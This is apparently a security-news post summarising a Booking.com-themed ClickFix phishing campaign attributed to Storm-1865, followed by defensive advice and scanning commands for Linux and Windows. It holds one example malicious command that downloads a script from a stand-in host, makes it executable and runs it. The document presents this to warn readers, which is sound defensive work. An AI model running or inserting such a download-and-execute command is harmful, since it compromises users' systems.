Phishing Campaign Impersonates Bookingcom, Delivers Credential-Stealing Malware

By /

Listen to this Post

Microsoft Threat Intelligence has identified a phishing campaign impersonating the travel site Booking.com, delivering credential-stealing malware used for fraud and theft. The campaign, attributed to the cybercrime actor Storm-1865, targets individuals in hospitality organizations. It employs a social engineering technique called ClickFix, tricking recipients into copying, pasting, and launching commands to download a malware payload.

You Should Know:

1. How the Attack Works:

  • The phishing emails impersonate Booking.com and target hospitality professionals.
  • The emails contain a fake CAPTCHA message prompting users to use a keyboard shortcut to launch a command.
  • The command downloads a malware payload designed to steal credentials.

2. Commands to Avoid:

  • Be cautious of commands like `curl` or `wget` that download files from unknown sources.
  • Example of a malicious command: 
    curl -o payload.sh http://malicious-site.com/payload.sh && chmod +x payload.sh && ./payload.sh
  • This command downloads a script, makes it executable, and runs it, potentially compromising your system.

3. Protection Steps:

  • Verify Email Sources: Always verify the sender’s email address and look for signs of phishing.
  • Avoid Copy-Pasting Commands: Do not copy and paste commands from unsolicited emails.
  • Use Antivirus Software: Ensure your system has updated antivirus software to detect and block malware.
  • Enable Multi-Factor Authentication (MFA): MFA adds an extra layer of security, making it harder for attackers to gain access even if they steal credentials.

4. Linux Commands for Security:

  • Check for Suspicious Processes: 
    ps aux | grep -i 'payload|malware'
  • Monitor Network Connections: 
    netstat -tuln
  • Scan for Malware with ClamAV: 
    sudo apt-get install clamav
sudo freshclam
sudo clamscan -r /home

5. Windows Commands for Security:

  • Check for Malicious Services: 
    sc query state= all
  • Monitor Network Activity: 
    netstat -ano
  • Scan for Malware with Windows Defender: 
    mpcmdrun -Scan -ScanType 2

What Undercode Say:

Phishing campaigns like the one targeting Booking.com users are becoming increasingly sophisticated, leveraging social engineering techniques to exploit human tendencies. It’s crucial to stay vigilant and adopt best practices for cybersecurity. Always verify the authenticity of emails, avoid executing unknown commands, and use security tools to protect your systems. By following these steps, you can significantly reduce the risk of falling victim to such attacks.

For more detailed analysis and protection recommendations, refer to the Microsoft Threat Intelligence Blog.

References:

Reported By: Jeremydallman Phishing – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: